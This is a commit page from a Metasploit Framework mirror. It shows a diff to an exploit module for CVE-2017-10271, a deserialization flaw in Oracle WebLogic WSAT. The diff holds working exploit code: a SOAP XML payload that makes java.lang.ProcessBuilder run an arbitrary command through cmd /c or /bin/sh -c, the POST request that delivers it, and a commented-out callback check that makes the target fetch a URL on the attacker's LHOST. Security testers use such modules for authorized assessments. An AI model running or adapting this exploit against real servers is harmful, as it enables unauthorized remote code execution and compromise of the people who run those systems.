infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix feedback from wvu-r7 

Fixes feedback from wvu-r7

- Consolidates payload to single method
- Replaces gsub! with standard encode method
- Note exploit discovery and proof of concept code used in authors (still seems weird to include the discovery as an author...)
- Change link
- Use `ARCH_CMD` instead of `[ARCH_CMD]`
- Remove Linux target as it's only Windows or Unix
- Remove timeout as I don't know how to pass it to `send_request_cgi`
MS-2855/keylogger-mettle-extension
Kevin Kirsche 2018-01-06 08:12:43 -05:00 committed by GitHub
parent 744f20304c
commit 867b32415d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 60 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

93
modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
View File

@ -16,13 +16,20 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service.
),
'License' => MSF_LICENSE,
'Author' => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
'Author' => [
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
'Luffin', # Proof of Concept
'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
],
'References' =>
[
[ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
[ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
[ 'POC', 'https://github.com/Luffin/CVE-2017-10271'],
[ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
[ 'CVE', '2017-10271']
],
'Platform' => %w{ win linux unix },
@ -30,13 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Targets' =>
[
[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
[ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
[ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
[ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ],
],
'Payload' =>
{
'DisableNops' => true
},
'DisclosureDate' => "Oct 19 2017",
# Note that this is by index, rather than name. It's generally easiest
# just to put the default at the beginning of the list and skip this
@ -47,24 +49,27 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([
OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
])
end
def cmd_payload
# Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need
# This escaping makes sure that our payload works!
replacements = [ ['&', '&amp;'], ['"', '&quot;'], ["'", '&apos;'], ['<', '&lt;'], ['>', '&gt;'] ]
xml_prepared = payload.encoded
replacements.each do |r|
xml_prepared.gsub!(r[0], r[1])
def cmd_base
if target_platform == 'win'
return 'cmd'
else
return '/bin/sh'
end
return xml_prepared
end
def unix_payload
def cmd_opt
if target_platform == 'win'
return '/c'
else
return '-c'
end
end
def process_builder_payload
# Generate a payload which will execute on a *nix machine using /bin/sh
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
@ -73,40 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>/bin/sh</string>
<string>#{cmd_base}</string>
</void>
<void index="1">
<string>-c</string>
<string>#{cmd_opt}</string>
</void>
<void index="2">
<string>#{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
# Generate a payload which will execute on a Windows machine using cmd
def windows_payload
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>#{cmd_payload}</string>
<string>#{payload.encoded.encode(xml: :text)}</string>
</void>
</array>
<void method="start"/>
@ -119,13 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
end
# Not sure how to catch the response, so I'll leave this here in case someone can help
# def check_payload
# This payload is used by sending to the RHOST and then you will receive an HTTP request
# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
# def http_check_payload
# xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
# <soapenv:Header>
# <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
# <java version="1.8" class="java.beans.XMLDecoder">
# <object id="url" class="java.net.URL">
# <string>http://{lhost}:{lport}/{random_uri}</string>
# <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
# </object>
# <object idref="url">
# <void id="stream" method = "openStream" />
@ -142,14 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
# followed by the fake return address and then the payload.
#
def exploit
target_os = datastore['TARGET'].to_i
xml_payload = ''
if target_os == 0
xml_payload = windows_payload
else
xml_payload = unix_payload
end
xml_payload = process_builder_payload
send_request_cgi(
'method' => 'POST',